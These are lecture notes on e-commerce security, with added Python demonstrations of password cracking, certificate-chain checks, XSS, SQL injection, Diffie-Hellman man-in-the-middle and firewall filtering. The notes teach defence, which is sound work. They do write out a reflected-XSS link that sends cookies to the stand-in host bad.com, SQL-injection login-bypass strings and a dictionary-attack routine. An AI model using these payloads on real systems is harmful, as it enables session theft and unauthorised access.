
COMP 3320

ELECTRONIC COMMERCE TECHNOLOGY


LECTURE 4: E-COMMERCE SECURITY

Dr John T. H.Yuen
(Main Reference Chapter 10) CYC 306, thyuen@cs.hku.hk
OVERVIEW

Understand
E-Com Security Basics
Client-side Security
Communication Security
Server-side Security
Data Privacy

WHY DO WE NEED E-COM SECURITY?

Security is something you have to pay for and maintain, but it does not generate profit.
Even if you invest a lot in security, the customer cannot see it; hence many companies put minimal effort into it.
But if you do NOT have enough security and your site is hacked, your customers are very unhappy!
FUNDAMENTAL SECURITY OBJECTIVES

Confidentiality: information is not disclosed or revealed to unauthorized persons. Secret information should remain invisible to outsiders (encryption).
Integrity: prevent unauthorized creation, alteration, or destruction of data. Any change must be detectable (hash function / digital signature).
Availability: ensure legitimate users are not unduly denied access to information and resources (legitimate users must still be allowed in).
WHAT IS E-COM SECURITY?

Two different perspectives:

Security features of a system (e.g., passwords that are at least 8 characters long, authentication of users, encryption of sensitive data). A password policy is an example of a security feature of the system.
Protection against attacks, rather than specific features of the system: e.g., protecting against privacy leakage, financial fraud and identity theft.
ATTACK SCENARIO

(Figure: shopper, mobile phone, network and merchant server, with the point at which each can be attacked.)
Attack software
Trick shopper
Hack mobile phone
Attack server
Snoop network: listen to the traffic between the shopper and the shop and pick the packets off the channel; make use of loopholes in the wireless network the shopper uses (e.g., a fake Wi-Fi router in a Starbucks).

The three areas covered in this lecture: Client-side Security, Communication Security, Server-side Security.


Client-side Security
in E-commerce
EXAMPLE

(Figure: a phishing message. The attacker pretends to be someone the user trusts.)

SOCIAL ENGINEERING

The attack targets the user himself, not the system.
PHISHING

Fraudulent attempt to obtain sensitive information such as usernames, passwords and credit card details by disguising as a trustworthy entity.
The e-mails are often deliberately crude: this helps the hacker single out the targets who are more vulnerable.
Long history of attacks since 1987. In 2017, 76% of organizations experienced phishing attacks.
In 2014, iCloud leaks of celebrity photos: a collection of almost 500 private pictures of various celebrities, such as Jennifer Lawrence and Kate Upton, were posted.
The photos were obtained via a breach of Apple's iCloud. It was found that the hacker phished by sending e-mails to the victims that looked like they came from Apple or Google, warning the victims that their accounts might be compromised and asking for their account details (user ID and password, e.g., under the pretext of resetting the password).
CLIENT SIDE SECURITY

(Figure: list of the most common passwords, as found on systems that have no password policies.)
CLIENT AUTHENTICATION

Education
E.g., a shopper should be advised to choose a stronger password and keep his password confidential.

Server password policies:

Maximum occurrence of consecutive characters: 3 characters
Maximum instances of any character: 4 instances
Maximum lifetime of passwords: 180 days
Minimum number of alphabetic characters: 1
Minimum number of numeric characters: 1
Minimum length of password: 6 characters
Entropy: how random your password is.
A strict password policy is not that useful on its own: in companies with strict policies, staff write their passwords on memos and stick them on the monitor.
Brute force attack: loop through all combinations of letters and numbers. Possible when hackers have obtained access to the (hashed) password database.
Dictionary attack: try words that normally exist.
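As an added example (written for this page, not part of the lecture), the Python below encodes the password policy from the slide above and then shows why a policy alone is not enough: a policy-compliant password that is a dictionary word plus a year falls to an offline dictionary attack as soon as a password database stored with an unsalted fast hash leaks, while a per-user salt and an iterated hash (PBKDF2) make the attacker pay the full cost per user per guess. The user table, the word list and the reading of "consecutive characters" as a run of the same character are assumptions.

```python
import hashlib
import os
import re

# The server password policy from the slide, encoded as rules.
# Assumption: "consecutive characters" means the same character repeated in a row.
POLICY = {
    "max_consecutive": 3,   # "aaa" is allowed, "aaaa" is not
    "max_instances": 4,     # no single character more than 4 times in total
    "min_alpha": 1,
    "min_digit": 1,
    "min_length": 6,
}

def check_policy(pw, policy=POLICY):
    """Return the list of rules the password violates (empty list = accepted)."""
    violations = []
    if len(pw) < policy["min_length"]:
        violations.append("min_length")
    if sum(c.isalpha() for c in pw) < policy["min_alpha"]:
        violations.append("min_alpha")
    if sum(c.isdigit() for c in pw) < policy["min_digit"]:
        violations.append("min_digit")
    if any(pw.count(c) > policy["max_instances"] for c in set(pw)):
        violations.append("max_instances")
    # a run of the same character longer than max_consecutive, e.g. "1111"
    if re.search(r"(.)\1{%d,}" % policy["max_consecutive"], pw):
        violations.append("max_consecutive")
    return violations

def sha256_hex(s):
    return hashlib.sha256(s.encode()).hexdigest()

# Constructed leaked database: unsalted SHA-256, the way many breached sites stored passwords.
LEAKED_UNSALTED = {
    "alice": sha256_hex("Summer2018"),   # passes the policy, but is a word plus a year
    "bob":   sha256_hex("letmein1"),
    "carol": sha256_hex("x7!Qp#r9Lz"),   # random: not in any dictionary
}
WORDLIST = ["password", "letmein", "summer", "winter", "welcome", "dragon"]

def candidates(words):
    """Dictionary attack word list with simple mangling: capitalisation and common suffixes."""
    for w in words:
        for base in (w, w.capitalize()):
            yield base
            for suffix in ("1", "123", "2017", "2018"):
                yield base + suffix

def dictionary_attack(db, words):
    """Offline attack: because the hashes are unsalted, one hash per candidate is
    enough to test that candidate against EVERY user in the database."""
    by_hash = {h: user for user, h in db.items()}
    cracked = {}
    for cand in candidates(words):
        user = by_hash.get(sha256_hex(cand))
        if user is not None:
            cracked[user] = cand
    return cracked

def pbkdf2_record(pw, iterations=200_000):
    """Store passwords this way instead: per-user random salt + slow iterated hash."""
    salt = os.urandom(16)
    return (salt, iterations, hashlib.pbkdf2_hmac("sha256", pw.encode(), salt, iterations))

def pbkdf2_verify(pw, record):
    salt, iterations, digest = record
    return hashlib.pbkdf2_hmac("sha256", pw.encode(), salt, iterations) == digest

if __name__ == "__main__":
    print(check_policy("Summer2018"), check_policy("aaaa11"))
    print(dictionary_attack(LEAKED_UNSALTED, WORDLIST))
```

With the salted records the attacker must recompute the slow hash once per user for every candidate, instead of once per candidate for the whole table, which is what turns a few seconds of cracking into a cost that scales with the number of users and the iteration count.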


CLIENT AUTHENTICATION

Who is responsible? Clients (education, see above) and developers.
Simple website: build your own using PHP + MySQL database.
Managing the intranet of a big company: use software like MS Active Directory.
Current trend: use OpenID.
OpenID: allows users to be authenticated by co-operating sites using a third-party service, eliminating the need for webmasters to provide their own ad hoc login systems.
TWO-FACTOR AUTHENTICATION (2FA)

2FA: a method of confirming users' claimed identities by using a combination of two different factors: 1) something they know, 2) something they have, or 3) something they are.
Common examples in e-commerce:
Credit Card Security Code + SMS confirmation during e-payment
E-banking password + security token
E-banking password + mobile token (fingerprint/FaceID)
Required by regulatory bodies for financial applications
CLIENT-SIDE SECURITY

Not much control from E-com developers:
One client can interact with many E-com servers.
Potential problem: information from E-com sites can be stolen from cookies on a client machine.
More serious problem: Active Content
Programs embedded in Web pages: whenever the page is sent, the program runs in the browser.
E.g. Java applets, ActiveX controls, JavaScript, VBScript
Attracts trojan horses, viruses, malicious cookies, zombies (a program that secretly takes over the computer)
Cross-Site Scripting attack (XSS attack)

DEFENCE: DIGITAL SIGNATURE AND CERTIFICATE

Hackers may capture the packets in transit, transform the active content into a trojan horse and send that on to the client instead.
Digital Signature: example of protecting Active Content to be executed on the client side.
Technical term: check the Digital Signatures of the Java Applets.
Digital signature: a mathematical scheme to verify the authenticity of digital messages.
1st: the signer generates a public/private key pair.
2nd: the signer signs the message using the private key.
3rd: the receiver (Bob) verifies the signature on the message using the signer's public key.
Trusted Third Parties are the Certification Authorities.
Used in a user-transparent manner: the browser handles this automatically.
SIGNED JAVA APPLETS

Client gets a program (Java Applet) from the Server.
The Java Applet contains a digital signature, signed by the Server with the server's private key.
Client (Browser) verifies the signature using the server's public key.
Q: how to ensure the public key is legitimate?

ATTACK & DEFENCE

How to ensure the public key is legitimate? Answer: use a public key certificate.
Public Key Certificate: issued by a Certification Authority (CA), a Trusted Third Party (TTP).
Root Certificate: browsers contain the root certificates of the general Certification Authorities.
(Figure: a hacker supplies his own public key together with a malicious Java Applet to the client browser; without a certificate the browser cannot tell this key from the real server's.)
ROOT CERT & PUBLIC KEY CERTIFICATE

Server: the merchant that needs the certificate.
CA_1: certificate authority.
Root Cert(s): usually bundled with the browser. By installing the browser we implicitly trust these CAs (e.g., Hongkong Post).
The Java Applet and the server's certificate both come from the server. The browser checks the correctness of the digital signature in the Java Applet in two steps (chain of trust):
Root Cert of CA_1 -> Server certificate (issued by CA_1): verified with the root cert.
Server certificate -> Java Applet (signature by Server): verified with the server's public key taken from the certificate.
Yes: program is safe. No: program is risky.

CERTIFICATE CHAIN

It is also possible to have the server's certificate issued by another party (an intermediate CA).
The intermediate CA has a certificate issued by CA_1. This takes the workload off the root CA, and an intermediate certificate can be revoked without replacing the root.
Root Cert of CA_1 -> Cert of Intermediate CA (issued by CA_1) -> Server cert (issued by Intermediate CA) -> Java Applet (signature by Server).
Yes: program is safe. No: program is risky.

ROOT CERTIFICATES IN BROWSER (A LOT!)

(Figure: the list of root certificates shipped with a browser.)
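An added example (written for this page, not part of the lecture) that models the two checks above in Python: a browser holding the root key of CA_1 verifies the chain root -> intermediate -> server and then the server's signature on the applet, and rejects a tampered applet or a chain that does not end at a trusted root. The RSA here is textbook RSA with a tiny modulus and no padding, chosen only so the code runs stand-alone; the certificate format, the names and the applet bytes are constructed.

```python
import hashlib
from math import gcd

# Toy textbook RSA: ~40-bit modulus, no padding. It shows the structure of signing and
# chain verification; it must never be used for real keys.
def next_prime(n):
    """Smallest prime >= n by trial division (fine for the small numbers used here)."""
    while True:
        if n > 1 and all(n % p for p in range(2, int(n ** 0.5) + 1)):
            return n
        n += 1

def keygen(seed):
    """Deterministic key pair from a seed so the example is reproducible."""
    p = next_prime(seed)
    q = next_prime(p + 1000)
    n, phi = p * q, (p - 1) * (q - 1)
    e = 65537
    while gcd(e, phi) != 1:
        e += 2
    return (n, e), (n, pow(e, -1, phi))      # (public key, private key)

def digest(data, n):
    """Message representative: SHA-256 of the data, reduced into the RSA group."""
    return int.from_bytes(hashlib.sha256(data).digest(), "big") % n

def sign(priv, data):
    n, d = priv
    return pow(digest(data, n), d, n)

def verify(pub, data, sig):
    n, e = pub
    return pow(sig, e, n) == digest(data, n)

def tbs(subject, pub, issuer):
    """'To be signed' content of a certificate: who owns which key, and who vouches for it."""
    return f"{subject}|{pub[0]}|{pub[1]}|{issuer}".encode()

def issue_cert(subject, subject_pub, issuer, issuer_priv):
    return {"subject": subject, "pub": subject_pub, "issuer": issuer,
            "sig": sign(issuer_priv, tbs(subject, subject_pub, issuer))}

def verify_chain(chain, trust_store):
    """chain[0] is the server cert, chain[-1] must be issued by a root in trust_store.
    Walk from the root down: each cert's signature is checked with the key above it."""
    issuer_pub = trust_store.get(chain[-1]["issuer"])
    if issuer_pub is None:
        return False                          # issuer is not a root the browser trusts
    for cert in reversed(chain):
        if not verify(issuer_pub, tbs(cert["subject"], cert["pub"], cert["issuer"]), cert["sig"]):
            return False
        issuer_pub = cert["pub"]              # this cert's key signs the next one down
    return True

def applet_is_safe(applet, applet_sig, chain, trust_store):
    """The browser's decision from the slides: chain OK and applet signature OK -> safe."""
    return verify_chain(chain, trust_store) and verify(chain[0]["pub"], applet, applet_sig)

# Constructed PKI: CA_1 (root, bundled with the browser), an intermediate CA, and good.com.
root_pub, root_priv = keygen(1_000_000)
inter_pub, inter_priv = keygen(2_000_000)
server_pub, server_priv = keygen(3_000_000)
TRUST_STORE = {"CA_1": root_pub}
inter_cert = issue_cert("Intermediate CA", inter_pub, "CA_1", root_priv)
server_cert = issue_cert("good.com", server_pub, "Intermediate CA", inter_priv)
CHAIN = [server_cert, inter_cert]
APPLET = b"class Shop { /* constructed applet bytes */ }"
APPLET_SIG = sign(server_priv, APPLET)

def demo():
    rogue_pub, rogue_priv = keygen(4_000_000)
    rogue_cert = issue_cert("good.com", rogue_pub, "Hacker CA", rogue_priv)  # self-issued
    return {
        "genuine": applet_is_safe(APPLET, APPLET_SIG, CHAIN, TRUST_STORE),
        "tampered_applet": applet_is_safe(APPLET + b" steal()", APPLET_SIG, CHAIN, TRUST_STORE),
        "untrusted_issuer": applet_is_safe(APPLET, sign(rogue_priv, APPLET), [rogue_cert], TRUST_STORE),
    }
```

The hacker in the third case owns a perfectly valid key pair and a correctly signed applet; what he cannot produce is a certificate for "good.com" whose signature verifies under a root the browser already trusts, which is exactly the check that makes the public key legitimate.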
XSS CROSS-SITE SCRIPTING

Original Web Client-Server concept:
Client sends an HTTP request to the Server.
Server sends an HTTP response, which is a web page, to be displayed on the Client (browser).
With client-side scripting (a not very secure extension):
Client sends an HTTP request to the Server.
Server sends an HTTP response, which is a web page containing a script: <script> </script>
Displaying a script means executing it (e.g., JavaScript) on the Client (browser).
A hacker web site gets the client to run a script (that steals information) that is delivered from an honest web site.
Accounted for 84% of all security vulnerabilities documented by Symantec as of 2007.
It is reported that XSS is still a major threat vector in 2017.

You can try at: https://xss-game.appspot.com/level1

Source: https://excess-xss.com/
A REFLECTED ATTACK TO STEAL COOKIES

One popular form: Reflected XSS
Client visits a bad site and receives a malicious link.
This malicious link points to a good site (e.g., it performs some search at the good site):
http://good.com/search.php?term </script>
Client user clicks the link.
When the good site returns the search result to the client, the bad script is executed on the client side.
The bad script came from the good site, so it is allowed to send cookies and other information belonging to the good site to the bad site.

REFLECTED XSS ATTACK

(Figure) Reflected XSS: the attack script is reflected back to the user in a page from the victim site.

Source: https://excess-xss.com/
PREVENTING XSS

Encoding: escapes the user input so that the browser interprets it only as data, not as code.
Validation: filters the user input so that, even where the browser does interpret it as code (e.g., permitted HTML markup), it contains no malicious commands.
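An added Python example (written for this page, not from the lecture or from excess-xss.com) of the reflected case above: it parses the term parameter of a constructed malicious link, shows the vulnerable search page that reflects it unchanged, and then the two defences just listed, HTML-encoding the output and validating the input against an allow-list. good.com, bad.com and search.php are the placeholder names used on the slides.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Constructed malicious link of the kind described on the slide: the search term is a
# script that sends the victim's good.com cookie to bad.com (URL-encoded as a browser would).
MALICIOUS_LINK = ("http://good.com/search.php?term=%3Cscript%3Edocument.location%3D"
                  "%27http%3A%2F%2Fbad.com%2F%3Fc%3D%27%2Bdocument.cookie%3C%2Fscript%3E")

def search_term(url):
    """What search.php receives as its 'term' parameter after URL-decoding."""
    return parse_qs(urlsplit(url).query).get("term", [""])[0]

def render_vulnerable(term):
    """Reflects the raw parameter into the HTML: the browser will execute any script in it."""
    return f"<h1>Results for {term}</h1>"

def render_encoded(term):
    """Encoding: HTML-escape the data so '<script>' is displayed as text, not parsed as a tag."""
    return f"<h1>Results for {html.escape(term, quote=True)}</h1>"

ALLOWED_TERM = re.compile(r"[A-Za-z0-9 '\-]{1,64}")

def validate_term(term):
    """Validation: allow-list of characters a search term may contain; anything else is rejected."""
    return term if ALLOWED_TERM.fullmatch(term) else None

def has_live_script(page):
    """Crude tester's check on the rendered page: is there a real <script ...> tag in it?"""
    return re.search(r"<script\b", page, re.IGNORECASE) is not None

def demo():
    term = search_term(MALICIOUS_LINK)
    return {
        "term": term,
        "vulnerable": has_live_script(render_vulnerable(term)),
        "encoded": has_live_script(render_encoded(term)),
        "validated": validate_term(term),
    }
```

The encoder must match the context the data lands in: html.escape is right for text inside an HTML element, but data placed inside a JavaScript string or a URL attribute needs the encoder for that context, otherwise the "data, not code" guarantee does not hold there.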
Communication Security
in E-commerce

POTENTIAL ATTACKS ON COMMUNICATION

Sniffing the network
E.g., an attacker monitors the data between the shopper and http://www.good.com, collects data about the shopper or steals personal information, such as credit card numbers.

Man-in-the-middle attack
E.g., an attacker (at http://www.g00d.com, a look-alike of http://www.good.com) pretends to be the server towards the user, and pretends to be the user towards the server.

NETWORK SECURITY

Technically, we cannot prevent people from reading our data: we rely on ISPs to forward our data for us.
But we can prevent people from understanding the data even if they read it: encrypt the data.
On the web this is done by SSL, known as Transport Layer Security (TLS) in its current version.
ENCRYPTION

Symmetric key encryption: the encryption and decryption keys are the same.

Source: https://pixelprivacy.com/resources/what-is-encryption/

SYMMETRIC KEY ENCRYPTION

(Figure: Julius Caesar and Alan Turing.)

https://crypto.interactive-maths.com/caesar-shift-cipher.html

CAESAR CIPHER

puayvkbjapvu av lsljayvupj jvttlyjl

2. Is there any clever way to decrypt the Caesar cipher?
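An added Python example (written for this page, not from the lecture) answering question 2 above: the key space of the Caesar cipher is only 26 shifts, so the "clever way" is to try every shift and let letter-frequency statistics pick the English one, with no need to know the key. The ciphertext is the one on the slide; the English frequency table and chi-squared scoring are the standard choices, not anything the slide specifies.

```python
from collections import Counter
import string

CIPHERTEXT = "puayvkbjapvu av lsljayvupj jvttlyjl"   # from the slide

# Relative letter frequencies of English text (%), a..z.
ENGLISH_FREQ = [8.2, 1.5, 2.8, 4.3, 12.7, 2.2, 2.0, 6.1, 7.0, 0.15, 0.77, 4.0, 2.4,
                6.7, 7.5, 1.9, 0.095, 6.0, 6.3, 9.1, 2.8, 0.98, 2.4, 0.15, 2.0, 0.074]

def shift(text, k):
    """Caesar encryption with key k; decryption is a shift by -k."""
    out = []
    for c in text:
        if c in string.ascii_lowercase:
            out.append(chr((ord(c) - 97 + k) % 26 + 97))
        else:
            out.append(c)            # spaces and punctuation pass through unchanged
    return "".join(out)

def chi_squared(text):
    """Distance of the letter histogram of `text` from English; lower is more English-like."""
    letters = [c for c in text if c in string.ascii_lowercase]
    counts = Counter(letters)
    n = len(letters) or 1
    total = 0.0
    for i, c in enumerate(string.ascii_lowercase):
        expected = n * ENGLISH_FREQ[i] / 100
        total += (counts[c] - expected) ** 2 / expected
    return total

def break_caesar(ciphertext):
    """Try all 26 keys (the whole key space) and keep the most English-looking plaintext."""
    best = min(range(26), key=lambda k: chi_squared(shift(ciphertext, -k)))
    return best, shift(ciphertext, -best)

if __name__ == "__main__":
    print(break_caesar(CIPHERTEXT))
```

The same idea, exhaustive search over a key space that is too small, is what breaks any cipher whose key is short; the scoring function is only there so the attacker does not have to read 26 candidates by eye.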
HOP BY HOP ENCRYPTION

(Figure: Client 1: PC, Client 2: iPad, Client 3: Mobile phone, each connected through the Internet to the Web Server. Each hop is encrypted with its own key: the Wi-Fi password on the PC's hop, the SIM card on the mobile phone's hop.)

Difficulty: key distribution problem.

PUBLIC KEY ENCRYPTION

Public key encryption: the encryption and decryption keys are different.

Source: https://pixelprivacy.com/resources/what-is-encryption/

END-TO-END ENCRYPTION

(Figure: the same three clients and Web Server, now with one encrypted channel running end to end from each client to the server.)

TLS/SSL: using digital certificates.
SSL IN E-COMMERCE

HTTPS: the standard HTTP protocol with a layer of SSL/TLS encryption. It protects against identity theft and man-in-the-middle attacks.
The SSL layer has 2 main purposes:
Verifying that you are talking directly to the server that you think you are talking to.
Ensuring that only the server can read what you send it and only you can read what it sends back.
Many customers will refuse to do business with a website that doesn't have SSL.
Displaying your SSL Site Seal tells customers they can shop with confidence, knowing they're protected.
Different certificates provide different levels of validation.

SSL OVERVIEW

Rough idea: the root cert of CA_1 has one extra function. From a public key certificate, anyone can build a "locked box" that can only be opened by the owner of the certificate. This is known as key exchange + encryption.
(Figure: Root Cert of CA_1 -> Bob's cert, issued by CA_1 -> locked box that can only be opened by Bob.)

KEY EXCHANGE

Rough idea of key exchange:
Generate a common secret key (which is used for encryption later).
No one can learn the secret by observing what is sent in public.
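An added example (written for this page, not from the lecture) in Python of Diffie-Hellman key exchange, which does exactly what the slide above asks: Alice and Bob each publish one value, an observer sees both, and only the two of them can derive the common secret. It also shows the failure mode that is the reason for the certificates on the surrounding slides: without authentication, a man-in-the-middle (Mallory) can run two exchanges and hold a key with each side. The prime is generated at run time as a 64-bit safe prime, far too small for real use; the party names are the ones the slides use.

```python
import hashlib
import secrets

def is_probable_prime(n, rounds=16):
    """Miller-Rabin primality test (probabilistic, error below 4**-rounds)."""
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29):
        if n % p == 0:
            return n == p
    d, s = n - 1, 0
    while d % 2 == 0:
        d //= 2
        s += 1
    for _ in range(rounds):
        a = secrets.randbelow(n - 3) + 2
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def safe_prime(bits):
    """p = 2q + 1 with p and q both prime. In such a group g = 4 (a square) generates the
    subgroup of prime order q, so there are no small subgroups for an attacker to exploit."""
    while True:
        q = secrets.randbits(bits - 1) | (1 << (bits - 2)) | 1
        p = 2 * q + 1
        if is_probable_prime(q) and is_probable_prime(p):
            return p

class Party:
    """One side of the exchange: keeps the private exponent, publishes g^x mod p."""
    def __init__(self, name, p, g):
        self.name, self.p, self.g = name, p, g
        self.x = secrets.randbelow(p - 2) + 1       # private, never sent
        self.public = pow(g, self.x, p)             # sent in the clear

    def session_key(self, peer_public):
        shared = pow(peer_public, self.x, self.p)   # g^(xy) mod p, identical on both sides
        size = (self.p.bit_length() + 7) // 8
        return hashlib.sha256(shared.to_bytes(size, "big")).digest()

def honest_exchange(p, g=4):
    alice, bob = Party("Alice", p, g), Party("Bob", p, g)
    # An observer sees alice.public and bob.public, but neither private exponent.
    return alice.session_key(bob.public), bob.session_key(alice.public)

def mitm_exchange(p, g=4):
    """Unauthenticated DH: Mallory replaces both public values in transit and ends up
    sharing one key with Alice and another with Bob, who both believe they talk to each other."""
    alice, bob = Party("Alice", p, g), Party("Bob", p, g)
    m_to_alice, m_to_bob = Party("Mallory", p, g), Party("Mallory", p, g)
    k_alice = alice.session_key(m_to_alice.public)   # Alice thinks this came from Bob
    k_bob = bob.session_key(m_to_bob.public)         # Bob thinks this came from Alice
    return (k_alice, m_to_alice.session_key(alice.public),
            k_bob, m_to_bob.session_key(bob.public))
```

Modern TLS uses this ephemeral exchange rather than the RSA "locked box" of the simplified steps, and closes the Mallory hole the same way the slides do: the server signs its public value with the private key belonging to its certificate, so a value that Mallory substitutes cannot carry Bob's signature and the handshake fails.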
SIMPLIFIED SSL STEPS

Bob gives Alice a cert (issued by CA_1).
Using the root cert of CA_1, Alice verifies the cert and creates a locked box that only Bob can open.
Alice creates a session key (SK) and puts it in this locked box.
From now on, Alice will use SK to send secret data to the server who claimed to be Bob.
If the server is really Bob: Bob can open the locked box, recover SK, and use SK to send data to Alice.
If the server is NOT Bob: the server will not find the correct SK value. Communication will halt.

HTTPS SERVER AUTHENTICATION WITH SSL

(Figure: the browser's certificate display for an HTTPS site.)
Demo: https://badssl.com/

Server-side Security
in E-commerce
SOFTWARE SECURITY IN SERVER SIDE

A program may contain bugs: given a crafted input, the attacker can run a piece of attack code on the server.
SQL injection: a command is placed as part of a SQL statement sent from the client, to be (illegally) executed in the server.
Undocumented features.
OS bugs that are not fixed.
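An added example (written for this page, not from the lecture) in Python with SQLite of the SQL injection point above, with the vulnerable login beside the parameterised one. The user table and the payloads are constructed; the password column is kept in plaintext only so the focus stays on the injection (see the password slides for how it should be stored).

```python
import sqlite3

def make_db():
    """Constructed in-memory user table for the demonstration."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (name TEXT, pw TEXT, is_admin INTEGER)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [("alice", "Summer2018", 0), ("admin", "x7!Qp#r9Lz", 1)])
    return con

def login_vulnerable(con, name, pw):
    """Client input pasted straight into the SQL text: the input becomes part of the command."""
    sql = f"SELECT name FROM users WHERE name = '{name}' AND pw = '{pw}'"
    return con.execute(sql).fetchone()

def login_safe(con, name, pw):
    """Parameterised query: the driver passes the values separately from the statement,
    so they are only ever compared as data and can never become SQL."""
    sql = "SELECT name FROM users WHERE name = ? AND pw = ?"
    return con.execute(sql, (name, pw)).fetchone()

# Classic payloads. In the first, the comment marker '--' removes the password check
# entirely; in the second, the OR makes the WHERE clause true for every row.
BYPASS_NAME = "admin' --"
BYPASS_PW = "' OR '1'='1"

def demo():
    con = make_db()
    return {
        "vuln_comment": login_vulnerable(con, BYPASS_NAME, "wrong"),
        "vuln_or": login_vulnerable(con, "alice", BYPASS_PW),
        "safe_comment": login_safe(con, BYPASS_NAME, "wrong"),
        "safe_or": login_safe(con, "alice", BYPASS_PW),
        "safe_genuine": login_safe(con, "alice", "Summer2018"),
    }
```

The vulnerable version executes `SELECT name FROM users WHERE name = 'admin' --' AND pw = 'wrong'`, where everything after `--` is a comment, so the attacker is logged in as admin without a password; escaping quotes by hand is the wrong fix, parameters are the right one.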


FIREWALL

Firewall: a network security system that monitors and controls incoming and outgoing network traffic based on predetermined security rules.
Types:
Packet filtering (late 1980s): checks packets by source and destination network addresses, protocol, source and destination port numbers.
Stateful filtering (1990s): retains packets until enough information is available to make a judgment about the state of the connection they belong to.
Application-layer filtering: understands certain application protocols (e.g., FTP/HTTP) to make the judgment.
Future: machine learning/AI??
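An added example (written for this page, not from the lecture) in Python that simulates the difference between the first two firewall types above on three constructed packets: the server's outbound call to a payment gateway, the gateway's reply, and an attacker probing an internal admin port. Addresses, ports and the rule set are constructed.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Packet:
    direction: str   # "in" (Internet -> server) or "out" (server -> Internet)
    src: str
    sport: int
    dst: str
    dport: int

def stateless_filter(pkt):
    """Packet filtering: decide on each packet alone from addresses and ports.
    Replies to the server's own outbound connections arrive on a high port, so a
    stateless rule set has to leave all high ports open just to let them in."""
    if pkt.direction == "out":
        return "allow"
    if pkt.dport == 443:          # the public HTTPS service
        return "allow"
    if pkt.dport >= 1024:         # "probably a reply": far too permissive
        return "allow"
    return "deny"

class StatefulFilter:
    """Stateful filtering: remember connections the server opened; only admit inbound
    packets that are for a published service or belong to a connection in the table."""
    def __init__(self, services=(443,)):
        self.services = set(services)
        self.table = set()        # (server_ip, server_port, remote_ip, remote_port)

    def decide(self, pkt):
        if pkt.direction == "out":
            self.table.add((pkt.src, pkt.sport, pkt.dst, pkt.dport))
            return "allow"
        if pkt.dport in self.services:
            return "allow"
        if (pkt.dst, pkt.dport, pkt.src, pkt.sport) in self.table:
            return "allow"        # reply to a connection the server started
        return "deny"

def demo():
    sf = StatefulFilter()
    server, bank, attacker = "10.0.0.5", "203.0.113.9", "198.51.100.7"   # constructed
    out = Packet("out", server, 51000, bank, 443)       # server calls the payment gateway
    reply = Packet("in", bank, 443, server, 51000)      # gateway answers on the high port
    probe = Packet("in", attacker, 4444, server, 8080)  # attacker hits an internal admin port
    sf.decide(out)                                      # the stateful filter records it
    return {
        "reply_stateless": stateless_filter(reply),
        "probe_stateless": stateless_filter(probe),
        "reply_stateful": sf.decide(reply),
        "probe_stateful": sf.decide(probe),
    }
```

Both filters let the legitimate reply through; only the stateful one can tell that the probe to port 8080 belongs to no connection the server ever opened, which is why stateless filters end up with the broad "allow high ports" rule that attackers rely on.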
POTENTIAL ATTACKS ON SERVER SIDE

In a denial-of-service (DoS) attack, the attacker makes a machine or network resource unavailable to its intended users by temporarily or indefinitely disrupting the services of a host connected to the Internet, typically by flooding the targeted machine or resource with superfluous requests to overload the system.
In a distributed denial-of-service (DDoS) attack, the incoming traffic flooding the victim originates from many different sources. It is impossible to stop the attack simply by blocking a single source.
On March 1, 2018, GitHub was hit by an attack of 1.35 terabits per second.
POTENTIAL ATTACKS ON SERVER SIDE

Ransomware (since 2012): a type of malicious software that threatens to publish the victim's data or perpetually block access to it unless a ransom is paid.
CryptoLocker (2013): a 2048-bit RSA key pair was generated, with the private key held on the attacker's server; the public key was used to encrypt files matching a whitelist of specific file extensions. It threatened to delete the private key if a payment in Bitcoin or a pre-paid cash voucher was not made within 3 days of the infection.
WannaCry (2017): spread using the EternalBlue exploit; infected more than 230,000 computers (e.g., FedEx, Honda, the UK NHS hospital system) in over 150 countries, using 20 different languages to demand money from users in Bitcoin. It demanded US$300 per computer within 7 days.

WANNACRY RANSOMWARE ATTACK

In May 2017, WannaCry ransomware targeted computers running the Microsoft Windows operating system by encrypting data and demanding ransom payments in the Bitcoin cryptocurrency.
Multiple causes:
Windows had a vulnerability (in its SMB file-sharing service).
It is believed that the NSA discovered it and used it to hack others (instead of informing Microsoft).
The hacking tool EternalBlue was leaked and circulated among hackers.
Microsoft eventually learned of the vulnerability and patched it in March 2017, but many machines were never updated.
In May 2017, WannaCry used EternalBlue to find vulnerable computers, then encrypted the files on them and asked for ransom.
The ransom is paid in Bitcoin, which is hard to tie to a real-world identity.
DATA PRIVACY

Data privacy concerns exist wherever personally identifiable information (PII) or other sensitive information is collected, stored, used, and finally destroyed or deleted.
If you do not use encrypted email, HTTPS, etc., your PII is very likely to be leaked to a hacker.
Even if you use encryption during communication (communication security), does the e-com website take good care of your data?
Did they store it securely? (server security)
Did they share it with other companies? Did they anonymize the data before sharing?
DATA ANONYMIZATION:
THE CASE OF NETFLIX

In 2006, Netflix published a large database as part of its $1 million Netflix Prize, a challenge to the world's researchers to improve the rental firm's movie-recommendation engine.
The public dataset did not include names; instead, an anonymous identifier was used for each user, together with that user's collection of movie ratings.
(Table: anonymized User IDs 123, 236, 753, 546, 423 and 674 against their ratings of Avengers, X-Men, Roma, Star Wars, Toy Story, Iron Man and It.)

DATA ANONYMIZATION:
THE CASE OF NETFLIX

IMDb: a public database of user ratings on movies.
(Table: the same movies rated by named users Alice, Bob, Carol, David and Eve.)
A combination of the anonymized Netflix data and the public IMDb database is enough to identify the people: a user's pattern of ratings links a Netflix ID to an IMDb name.
May cause embarrassment to Bob if his Netflix record (named 236) showed that he watched some XXX movies.
Resulted in a lawsuit in the end.

Reference: How To Break Anonymity of the Netflix Prize Dataset. Arvind Narayanan, Vitaly Shmatikov. 2006.
GENERAL DATA PROTECTION REGULATION (GDPR) IN 2018

A regulation in European Union (EU) law on data protection and privacy for all individuals within the EU.
Business processes that handle personal data:
must be designed and built with consideration of the principles and provide safeguards to protect data (e.g., using pseudonymization or full anonymization where appropriate);
must use the highest-possible privacy settings by default.
Businesses must report any data breach within 72 hours.

DATA SHARING WITH CARE

Data sharing between companies is common.
THE INFLUENCE OF DATA ANALYTICS

In 2014, approximately 270,000 people used a Facebook app to take a personality test for academic research purposes (the app was shut down in 2015).
